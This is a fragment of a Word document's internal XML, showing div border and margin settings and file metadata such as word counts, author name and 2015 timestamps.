            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2145345101">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="827674699">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1656178316">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="75"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1353140848">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1389693927">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="392512973">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1789811365">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="75"/>
          <w:marBottom w:val="75"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:left w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:bottom w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
            <w:right w:val="single" w:sz="6" w:space="4" w:color="CCCCCC"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="21278929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javascript:void(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4774</Words>
  <Characters>27213</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>226</Lines>
  <Paragraphs>63</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>31924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lin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>jason lin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-10-19T09:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-10-19T09:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>